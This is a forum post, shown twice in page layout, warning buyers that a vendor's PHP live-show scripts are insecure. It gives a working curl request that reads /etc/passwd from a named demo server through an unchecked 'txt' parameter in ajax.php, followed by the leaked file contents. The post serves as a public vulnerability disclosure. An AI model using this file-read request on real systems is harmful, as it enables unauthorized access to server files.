GoFuckYourself.com - Adult Webmaster Forum - View Single Post - For Sale Responsive Liveshow PHP/MySQL Script for sale

topbacklinks · 10-16-2016, 02:47 AM

Hi guys !

WARNING

Sylvain86 scripts have security flaws that allow access to all of your content on your servers.

An example with another script that sells (but it has the same vulnerabilities on the Live script):

~# curl 'http://demo.necatis.com/grabber_english/ajax.php?txt=/etc/passwd' -H 'Host: demo.necatis.com' -H 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0' -H 'Accept: */*' -H 'Accept-Language: fr,en;q=0.7,en-US;q=0.3' --compressed -H 'DNT: 1' -H 'X-Requested-With: XMLHttpRequest' -H 'Referer: Downloading...' -H 'Connection: keep-alive'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
sshd:x:101:65534::/var/run/sshd:/usr/sbin/nologin
mysql:x:102:104:MySQL Server,,,:/nonexistent:/bin/false
psaadm:x:999:1000:psa user:/opt/psa/admin:/bin/false
popuser:x:30:31:POP3 service user:/var/qmail/popuser:/bin/false
mhandlers-user:x:31:31:mail handlers user:/:/bin/false
sw-cp-server:x:998:999:sw-cp-server user:/var/lib/sw-cp-server:/bin/false
postfix:x:103:106::/var/spool/postfix:/bin/false
drweb:x:104:1004:Dr.Web system account:/var/drweb:/bin/false
dovecot:x:997:1005:Dovecot IMAP server user:/usr/lib/dovecot:/bin/false
dovenull:x:996:1006:Dove

10-16-2016, 02:47 AM
topbacklinks Confirmed User Industry Role: Join Date: Jun 2011 Posts: 166	Hi guys ! WARNING Sylvain86 scripts have security flaws that allow access to all of your content on your servers. An example with another script that sells (but it has the same vulnerabilities on the Live script): ~# curl 'http://demo.necatis.com/grabber_english/ajax.php?txt=/etc/passwd' -H 'Host: demo.necatis.com' -H 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0' -H 'Accept: /' -H 'Accept-Language: fr,en;q=0.7,en-US;q=0.3' --compressed -H 'DNT: 1' -H 'X-Requested-With: XMLHttpRequest' -H 'Referer: Downloading...' -H 'Connection: keep-alive' root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh libuuid:x:100:101::/var/lib/libuuid:/bin/sh sshd:x:101:65534::/var/run/sshd:/usr/sbin/nologin mysql:x:102:104:MySQL Server,,,:/nonexistent:/bin/false psaadm:x:999:1000:psa user:/opt/psa/admin:/bin/false popuser:x:30:31:POP3 service user:/var/qmail/popuser:/bin/false mhandlers-user:x:31:31:mail handlers user:/:/bin/false sw-cp-server:x:998:999:sw-cp-server user:/var/lib/sw-cp-server:/bin/false postfix:x:103:106::/var/spool/postfix:/bin/false drweb:x:104:1004:Dr.Web system account:/var/drweb:/bin/false dovecot:x:997:1005:Dovecot IMAP server user:/usr/lib/dovecot:/bin/false dovenull:x:996:1006:Dove